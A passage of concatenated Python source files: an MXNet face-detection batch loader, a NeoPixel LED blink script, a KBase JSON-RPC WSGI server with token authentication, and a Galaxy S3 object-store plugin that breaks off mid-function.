#print(gt_boxes.shape) for k in self.label_name: label[k] = label_dict[k] all_data = dict() for key in self.data_name: all_data[key] = tensor_vstack([batch[key] for batch in data_list]) all_label = dict() for key in self.label_name: pad = 0 if key.startswith('bbox_') else -1 #print('label vstack', key, pad, len(label_list), file=sys.stderr) all_label[key] = tensor_vstack([batch[key] for batch in label_list], pad=pad) self.data = [mx.nd.array(all_data[key]) for key in self.data_name] self.label = [mx.nd.array(all_label[key]) for key in self.label_name] #print(self._times) class CropLoader2(mx.io.DataIter): def __init__(self, feat_sym, roidb, batch_size=1, shuffle=False, ctx=None, work_load_list=None, aspect_grouping=False): """ This Iter will provide roi data to Fast R-CNN network :param feat_sym: to infer shape of assign_output :param roidb: must be preprocessed :param batch_size: must divide BATCH_SIZE(128) :param shuffle: bool :param ctx: list of contexts :param work_load_list: list of work load :param aspect_grouping: group images with similar aspects :return: AnchorLoader """ super(CropLoader2, self).__init__() # save parameters as properties self.feat_sym = feat_sym self.roidb = roidb self.batch_size = batch_size self.shuffle = shuffle self.ctx = ctx if self.ctx is None: self.ctx = [mx.cpu()] self.work_load_list = work_load_list #self.feat_stride = feat_stride #self.anchor_scales = anchor_scales #self.anchor_ratios = anchor_ratios #self.allowed_border = allowed_border self.aspect_grouping = aspect_grouping self.feat_stride = config.RPN_FEAT_STRIDE # infer properties from roidb self.size = len(roidb) # decide data and label names #self.data_name = ['data'] #self.label_name = [] #self.label_name.append('label') #self.label_name.append('bbox_target') #self.label_name.append('bbox_weight') self.data_name = ['data'] #self.label_name = ['label', 'bbox_target', 'bbox_weight'] self.label_name = [] prefixes = ['face'] if config.HEAD_BOX: prefixes.append('head') names = [] for prefix in prefixes: names += [prefix+'_label', prefix+'_bbox_target', prefix+'_bbox_weight'] if prefix=='face' and config.FACE_LANDMARK: names += [prefix+'_landmark_target', prefix+'_landmark_weight'] #names = ['label', 'bbox_weight'] for stride in self.feat_stride: for n in names: k = "%s_stride%d"%(n,stride) self.label_name.append(k) # status variable for synchronization between get_data and get_label self.cur = 0 self.batch = None self.data = None self.label = None # get first batch to fill in provide_data and provide_label self.reset() self.q_in = [multiprocessing.Queue(1024) for i in range(config.NUM_CPU)] #self.q_in = multiprocessing.Queue(1024) self.q_out = multiprocessing.Queue(1024) self.start() self.get_batch() @property def provide_data(self): return [(k, v.shape) for k, v in zip(self.data_name, self.data)] @property def provide_label(self): return [(k, v.shape) for k, v in zip(self.label_name, self.label)] def reset(self): pass @staticmethod def input_worker(q_in, roidb, batch_size): index = np.arange(len(roidb)) np.random.shuffle(index) cur_from = 0 while True: cur_to = cur_from + batch_size if cur_to>len(roidb): np.random.shuffle(index) cur_from = 0 continue _roidb = [roidb[index[i]] for i in range(cur_from, cur_to)] istart = index[cur_from] q_in[istart%len(q_in)].put(_roidb) cur_from = cur_to @staticmethod def gen_worker(q_in, q_out): while True: deq = q_in.get() if deq is None: break _roidb = deq data, label = get_crop_batch(_roidb) print('generated') q_out.put( (data, label) ) def start(self): input_process = multiprocessing.Process(target=CropLoader2.input_worker, args=(self.q_in, self.roidb, self.batch_size)) #gen_process = multiprocessing.Process(target=gen_worker, args=(q_in, q_out)) gen_process = [multiprocessing.Process(target=CropLoader2.gen_worker, args=(self.q_in[i], self.q_out)) \ for i in range(config.NUM_CPU)] input_process.start() for p in gen_process: p.start() def next(self): self.get_batch() return mx.io.DataBatch(data=self.data, label=self.label, provide_data=self.provide_data, provide_label=self.provide_label) def infer_shape(self, max_data_shape=None, max_label_shape=None): """ Return maximum data and label shape for single gpu """ if max_data_shape is None: max_data_shape = [] if max_label_shape is None: max_label_shape = [] max_shapes = dict(max_data_shape + max_label_shape) input_batch_size = max_shapes['data'][0] dummy_boxes = np.zeros((0, 5)) dummy_info = [ [max_shapes['data'][2], max_shapes['data'][3], 1.0] ] dummy_label = {'gt_boxes' : dummy_boxes} # infer shape feat_shape_list = [] for i in range(len(self.feat_stride)): _, feat_shape, _ = self.feat_sym[i].infer_shape(**max_shapes) feat_shape = [int(i) for i in feat_shape[0]] feat_shape_list.append(feat_shape) label_dict = {} if config.HEAD_BOX: head_label_dict = assign_anchor_fpn(feat_shape_list, dummy_label, dummy_info, False, prefix='head') label_dict.update(head_label_dict) if config.FACE_LANDMARK: dummy_landmarks = np.zeros( (0,11) ) dummy_label['gt_landmarks'] = dummy_landmarks face_label_dict = assign_anchor_fpn(feat_shape_list, dummy_label, dummy_info, config.FACE_LANDMARK, prefix='face') label_dict.update(face_label_dict) label_list = [] for k in self.label_name: label_list.append(label_dict[k]) label_shape = [(k, tuple([input_batch_size] + list(v.shape[1:]))) for k, v in zip(self.label_name, label_list)] return max_data_shape, label_shape def get_batch(self): deq = self.q_out.get() print('q_out got') data_list, label_list = deq for data, label in zip(data_list, label_list): data_shape = {k: v.shape for k, v in data.items()} del data_shape['im_info'] feat_shape_list = [] for s in range(len(self.feat_stride)): _, feat_shape, _ = self.feat_sym[s].infer_shape(**data_shape) feat_shape = [int(i) for i in feat_shape[0]] feat_shape_list.append(feat_shape) #for k in self.label_name: # label[k] = [0 for i in range(config.TRAIN.BATCH_IMAGES)] im_info = data['im_info'] gt_boxes = label['gt_boxes'] gt_label = {'gt_boxes':gt_boxes} label_dict = {} head_label_dict = assign_anchor_fpn(feat_shape_list, gt_label, im_info, False, prefix='head') label_dict.update(head_label_dict) if config.FACE_LANDMARK: gt_landmarks = label['gt_landmarks'] gt_label['gt_landmarks'] = gt_landmarks face_label_dict = assign_anchor_fpn(feat_shape_list, gt_label, im_info, config.FACE_LANDMARK, prefix='face') label_dict.update(face_label_dict) #print('im_info', im_info.shape) #print(gt_boxes.shape) for k in self.label_name: label[k] = label_dict[k] all_data = dict() for key in self.data_name: all_data[key] = tensor_vstack([batch[key] for batch in data_list]) all_label = dict() for key in self.label_name: pad = 0 if key.startswith('bbox_') else -1 #print('label vstack', key, pad, len(label_list), file=sys.stderr) all_label[key] = tensor_vstack([batch[key] for batch in label_list], pad=pad) self.data = [mx.nd.array(all_data[key]) for key in self.data_name] self.label = [mx.nd.array(all_label[key]) for key in self.label_name]
lyr_blink.py
#!/usr/bin/python import pxlBuffer as pxb import random from time import sleep import time def blinkColor(q, led_count, layerNum, wait_ms=1, color="random", runtime=30): layer = pxb.pixelLayer(q, led_count, layerNum) if color == "random": rnd = True else: rnd = False endTime=time.time()+runtime while time.time() < endTime: if rnd: color=pxb.Color(random.randrange(0,256), random.randrange(0,256), random.randrange(0,256)) layer[0:layer.size+1] = color; layer.show() sleep(random.randrange(1,300)/1000.0) #sleep(wait_ms/1000.0) layer[0:layer.size+1] = None; layer.show() sleep(random.randrange(1,1000)/1000.0) #sleep(wait_ms/1000.0) #sleep(wait_ms/1000.0) layer.die() # entry function def NeoFX(q, led_count, layerNum, *args): blinkColor(q, led_count, layerNum, *args) # if we're testing the module, setup and execute if __name__ == "__main__": from neopixel import * import multiprocessing import time from pprint import pprint # target FPS #TARGET_FPS = 1 TARGET_FPS = 24 # LED strip configuration: LED_COUNT = 632 # Number of LED pixels. LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!). LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz) LED_DMA = 5 # DMA channel to use for generating signal (try 5) LED_BRIGHTNESS = 128 # Set to 0 for darkest and 255 for brightest LED_INVERT = False # True to invert the signal (when using NPN transistor level shift) q = multiprocessing.Queue() def masterThread(q): # Create NeoPixel object with appropriate configuration. strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS) # Intialize the library (must be called once before other functions). strip.begin() master = pxb.pixelMaster(strip, q) master.show() #pprint(master.layers) #pprint(master.ledsColorBuffer) startTime=time.time() iterTime=startTime count=1 targetSleep=1/float(TARGET_FPS) print "target FPS: %s" % TARGET_FPS print "target runtime per frame: %s" % targetSleep updateFreq=TARGET_FPS*10 # every 10 seconds while master.die == False: iterTime=time.time() runTime=(time.time()-startTime) master.show() if count % updateFreq == 0: print "Time: %2.3f FPS: %2.3f" % (runTime, count/runTime) print master.layers startTime=time.time() count = 1 else: count += 1 sleepTime=targetSleep-(time.time()-iterTime) if sleepTime > 0: sleep(sleepTime) m = multiprocessing.Process(target=masterThread, args=(q,)) m.daemon=True m.start() try: layer = 1 while True: NeoFX(q, LED_COUNT, layer) layer += 1 except KeyboardInterrupt: q.put("die") m.join()
ExampleServer.py
#!/usr/bin/env python # -*- coding: utf-8 -*- from wsgiref.simple_server import make_server import sys import json import traceback import datetime from multiprocessing import Process from getopt import getopt, GetoptError from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\ JSONRPCError, InvalidRequestError from jsonrpcbase import ServerError as JSONServerError from os import environ from ConfigParser import ConfigParser from biokbase import log import requests as _requests import random as _random import os from Example.authclient import KBaseAuth as _KBaseAuth DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' AUTH = 'auth-service-url' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'Example'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from Example.ExampleImpl import Example # noqa @IgnorePep8 impl_Example = Example(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = JSONServerError() newerr.trace = traceback.format_exc() if isinstance(e.message, basestring): newerr.data = e.message else: # Some exceptions embed other exceptions as the message newerr.data = repr(e.message) raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. """ rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns its response.""" if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8 self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self['provenance'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def provenance(self): callbackURL = os.environ.get('SDK_CALLBACK_URL') if callbackURL: # OK, there's a callback server from which we can get provenance arg_hash = {'method': 'CallbackServer.get_provenance', 'params': [], 'version': '1.1', 'id': str(_random.random())[2:] } body = json.dumps(arg_hash) response = _requests.post(callbackURL, data=body, timeout=60) response.encoding = 'utf-8' if response.status_code == 500: if ('content-type' in response.headers and response.headers['content-type'] == 'application/json'): err = response.json() if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, response.text) else: raise ServerError('Unknown', 0, response.text) if not response.ok: response.raise_for_status() resp = response.json() if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'][0] else: return self.get('provenance') class ServerError(Exception): ''' The call returned an error. Fields: name - the name of the error. code - the error code. message - a human readable error message. data - the server side stacktrace. ''' def __init__(self, name, code, message, data=None, error=None): super(Exception, self).__init__(message) self.name = name self.code = code self.message = message if message else '' self.data = data or error or '' # data = JSON RPC 2.0, error = 1.1 def __str__(self): return self.name + ': ' + str(self.code) + '. ' + self.message + \ '\n' + self.data def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'Example' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_Example.filter_contigs, name='Example.filter_contigs', types=[dict]) self.method_authentication['Example.filter_contigs'] = 'required' # noqa self.rpc_service.add(impl_Example.status, name='Example.status', types=[dict]) authurl = config.get(AUTH) if config else None self.auth_client = _KBaseAuth(authurl) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = { 'call_stack': [{'time': self.now_in_utc(), 'method': req['method']} ] } prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params'] } ctx['provenance'] = [prov_action] try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] auth_req = self.method_authentication.get( method_name, 'none') if auth_req != 'none': if token is None and auth_req == 'required': err = JSONServerError() err.data = ( 'Authentication required for ' + 'Example ' + 'but no authentication header was passed') raise err elif token is None and auth_req == 'optional': pass else: try: user = self.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception, e: if auth_req == 'required': err = JSONServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print 'Request method was %s\n' % environ['REQUEST_METHOD'] # print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ) # print 'Request body was: %s' % request_body # print 'Result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] e = error['error'].get('error') if not e: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8 dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. # This simply lists where to "mount" the application in the URL path # # This uwsgi module "magically" appears when running the app within # uwsgi and is not available otherwise, so wrap an exception handler # around it # # To run this server in uwsgi with 4 workers listening on port 9999 use: # uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_ # To run a using the single threaded python BaseHTTP service # listening on port 9999 by default execute this file # try: import uwsgi # Before we do anything with the application, see if the # configs specify patching all std routines to be asynch # *ONLY* use this if you are going to wrap the service in # a wsgi container that has enabled gevent, such as # uwsgi with the --gevent option if config is not None and config.get('gevent_monkeypatch_all', False): print "Monkeypatching std libraries for async" from gevent import monkey monkey.patch_all() uwsgi.applications = {'': application} except ImportError: # Not available outside of wsgi, ignore pass _proc = None def start_server(host='localhost', port=0, newprocess=False): ''' By default, will start the server on localhost on a system assigned port in the main thread. Excecution of the main thread will stay in the server main loop until interrupted. To run the server in a separate process, and thus allow the stop_server method to be called, set newprocess = True. This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print "Listening on port %s" % port if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user = application.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 ctx['module'], ctx['method'] = req['method'].split('.') prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params']} ctx['provenance'] = [prov_action] resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1])): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError as err: # print help information and exit: print str(err) # will print something like "option -a not recognized" sys.exit(2) port = 9999 host = 'localhost' for o, a in opts: if o == '--port': port = int(a) elif o == '--host': host = a print "Host set to %s" % host else: assert False, "unhandled option" start_server(host=host, port=port) # print "Listening on port %s" % port # httpd = make_server( host, port, application) # # httpd.serve_forever()
s3.py
""" Object Store plugin for the Amazon Simple Storage Service (S3) """ import logging import multiprocessing import os import shutil import subprocess import threading import time from datetime import datetime try: # Imports are done this way to allow objectstore code to be used outside of Galaxy. import boto from boto.exception import S3ResponseError from boto.s3.connection import S3Connection from boto.s3.key import Key except ImportError: boto = None # type: ignore[assignment] from galaxy.exceptions import ( ObjectInvalid, ObjectNotFound, ) from galaxy.util import ( directory_hash_id, string_as_bool, umask_fix_perms, unlink, which, ) from galaxy.util.path import safe_relpath from galaxy.util.sleeper import Sleeper from .s3_multipart_upload import multipart_upload from ..objectstore import ( ConcreteObjectStore, convert_bytes, ) NO_BOTO_ERROR_MESSAGE = ( "S3/Swift object store configured, but no boto dependency available." "Please install and properly configure boto or modify object store configuration." ) log = logging.getLogger(__name__) logging.getLogger("boto").setLevel(logging.INFO) # Otherwise boto is quite noisy def parse_config_xml(config_xml): try: a_xml = config_xml.findall("auth")[0] access_key = a_xml.get("access_key") secret_key = a_xml.get("secret_key") b_xml = config_xml.findall("bucket")[0] bucket_name = b_xml.get("name") use_rr = string_as_bool(b_xml.get("use_reduced_redundancy", "False")) max_chunk_size = int(b_xml.get("max_chunk_size", 250)) cn_xml = config_xml.findall("connection") if not cn_xml: cn_xml = {} else: cn_xml = cn_xml[0] host = cn_xml.get("host", None) port = int(cn_xml.get("port", 6000)) multipart = string_as_bool(cn_xml.get("multipart", "True")) is_secure = string_as_bool(cn_xml.get("is_secure", "True")) conn_path = cn_xml.get("conn_path", "/") c_xml = config_xml.findall("cache")[0] cache_size = float(c_xml.get("size", -1)) staging_path = c_xml.get("path", None) tag, attrs = "extra_dir", ("type", "path") extra_dirs = config_xml.findall(tag) if not extra_dirs: msg = f"No {tag} element in XML tree" log.error(msg) raise Exception(msg) extra_dirs = [{k: e.get(k) for k in attrs} for e in extra_dirs] return { "auth": { "access_key": access_key, "secret_key": secret_key, }, "bucket": { "name": bucket_name, "use_reduced_redundancy": use_rr, "max_chunk_size": max_chunk_size, }, "connection": { "host": host, "port": port, "multipart": multipart, "is_secure": is_secure, "conn_path": conn_path, }, "cache": { "size": cache_size, "path": staging_path, }, "extra_dirs": extra_dirs, } except Exception: # Toss it back up after logging, we can't continue loading at this point. log.exception("Malformed ObjectStore Configuration XML -- unable to continue") raise class CloudConfigMixin: def _config_to_dict(self): return { "auth": { "access_key": self.access_key, "secret_key": self.secret_key, }, "bucket": { "name": self.bucket, "use_reduced_redundancy": self.use_rr, }, "connection": { "host": self.host, "port": self.port, "multipart": self.multipart, "is_secure": self.is_secure, "conn_path": self.conn_path, }, "cache": { "size": self.cache_size, "path": self.staging_path, }, "enable_cache_monitor": False, } class S3ObjectStore(ConcreteObjectStore, CloudConfigMixin): """ Object store that stores objects as items in an AWS S3 bucket. A local cache exists that is used as an intermediate location for files between Galaxy and S3. """ store_type = "s3" def __init__(self, config, config_dict): super().__init__(config, config_dict) self.transfer_progress = 0 auth_dict = config_dict["auth"] bucket_dict = config_dict["bucket"] connection_dict = config_dict.get("connection", {}) cache_dict = config_dict["cache"] self.enable_cache_monitor = config_dict.get("enable_cache_monitor", True) self.access_key = auth_dict.get("access_key") self.secret_key = auth_dict.get("secret_key") self.bucket = bucket_dict.get("name") self.use_rr = bucket_dict.get("use_reduced_redundancy", False) self.max_chunk_size = bucket_dict.get("max_chunk_size", 250) self.host = connection_dict.get("host", None) self.port = connection_dict.get("port", 6000) self.multipart = connection_dict.get("multipart", True) self.is_secure = connection_dict.get("is_secure", True) self.conn_path = connection_dict.get("conn_path", "/") self.cache_size = cache_dict.get("size", -1) self.staging_path = cache_dict.get("path") or self.config.object_store_cache_path extra_dirs = {e["type"]: e["path"] for e in config_dict.get("extra_dirs", [])} self.extra_dirs.update(extra_dirs) self._initialize() def _initialize(self): if boto is None: raise Exception(NO_BOTO_ERROR_MESSAGE) # for multipart upload self.s3server = { "access_key": self.access_key, "secret_key": self.secret_key, "is_secure": self.is_secure, "max_chunk_size": self.max_chunk_size, "host": self.host, "port": self.port, "use_rr": self.use_rr, "conn_path": self.conn_path, } self._configure_connection() self._bucket = self._get_bucket(self.bucket) self.start_cache_monitor() # Test if 'axel' is available for parallel download and pull the key into cache if which("axel"): self.use_axel = True else: self.use_axel = False def start_cache_monitor(self): # Clean cache only if value is set in galaxy.ini if self.cache_size != -1 and self.enable_cache_monitor: # Convert GBs to bytes for comparison self.cache_size = self.cache_size * 1073741824 # Helper for interruptable sleep self.sleeper = Sleeper() self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor) self.cache_monitor_thread.start() log.info("Cache cleaner manager started") def _configure_connection(self): log.debug("Configuring S3 Connection") # If access_key is empty use default credential chain if self.access_key: self.conn = S3Connection(self.access_key, self.secret_key) else: self.conn = S3Connection() @classmethod def parse_xml(clazz, config_xml): return parse_config_xml(config_xml) def to_dict(self): as_dict = super().to_dict() as_dict.update(self._config_to_dict()) return as_dict def __cache_monitor(self): time.sleep(2) # Wait for things to load before starting the monitor while self.running: total_size = 0 # Is this going to be too expensive of an operation to be done frequently? file_list = [] for dirpath, _, filenames in os.walk(self.staging_path): for filename in filenames: filepath = os.path.join(dirpath, filename) file_size = os.path.getsize(filepath) total_size += file_size # Get the time given file was last accessed last_access_time = time.localtime(os.stat(filepath)[7]) # Compose a tuple of the access time and the file path file_tuple = last_access_time, filepath, file_size file_list.append(file_tuple) # Sort the file list (based on access time) file_list.sort() # Initiate cleaning once within 10% of the defined cache size? cache_limit = self.cache_size * 0.9 if total_size > cache_limit: log.info( "Initiating cache cleaning: current cache size: %s; clean until smaller than: %s", convert_bytes(total_size), convert_bytes(cache_limit), ) # How much to delete? If simply deleting up to the cache-10% limit, # is likely to be deleting frequently and may run the risk of hitting # the limit - maybe delete additional #%? # For now, delete enough to leave at least 10% of the total cache free delete_this_much = total_size - cache_limit self.__clean_cache(file_list, delete_this_much) self.sleeper.sleep(30) # Test cache size every 30 seconds? def __clean_cache(self, file_list, delete_this_much): """Keep deleting files from the file_list until the size of the deleted files is greater than the value in delete_this_much parameter. :type file_list: list :param file_list: List of candidate files that can be deleted. This method will start deleting files from the beginning of the list so the list should be sorted accordingly. The list must contains 3-element tuples, positioned as follows: position 0 holds file last accessed timestamp (as time.struct_time), position 1 holds file path, and position 2 has file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394) :type delete_this_much: int :param delete_this_much: Total size of files, in bytes, that should be deleted. """ # Keep deleting datasets from file_list until deleted_amount does not # exceed delete_this_much; start deleting from the front of the file list, # which assumes the oldest files come first on the list. deleted_amount = 0 for entry in file_list: if deleted_amount < delete_this_much: deleted_amount += entry[2] os.remove(entry[1]) # Debugging code for printing deleted files' stats # folder, file_name = os.path.split(f[1]) # file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0]) # log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \ # % (i, file_name, convert_bytes(f[2]), file_date, \ # convert_bytes(deleted_amount), convert_bytes(delete_this_much))) else: log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount)) return def _get_bucket(self, bucket_name): """Sometimes a handle to a bucket is not established right away so try it a few times. Raise error is connection is not established.""" for i in range(5): try: bucket = self.conn.get_bucket(bucket_name) log.debug("Using cloud object store with bucket '%s'", bucket.name) return bucket except S3ResponseError: try: log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name) self.conn.create_bucket(bucket_name) except S3ResponseError: log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1) time.sleep(2) # All the attempts have been exhausted and connection was not established, # raise error raise S3ResponseError def _fix_permissions(self, rel_path): """Set permissions on rel_path""" for basedir, _, files in os.walk(rel_path): umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid) for filename in files: path = os.path.join(basedir, filename) # Ignore symlinks if os.path.islink(path): continue umask_fix_perms(path, self.config.umask, 0o666, self.config.gid) def _construct_path( self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs, ): # extra_dir should never be constructed from provided data but just # make sure there are no shenannigans afoot if extra_dir and extra_dir != os.path.normpath(extra_dir): log.warning("extra_dir is not normalized: %s", extra_dir) raise ObjectInvalid("The requested object is invalid") # ensure that any parent directory references in alt_name would not # result in a path not contained in the directory path constructed here if alt_name: 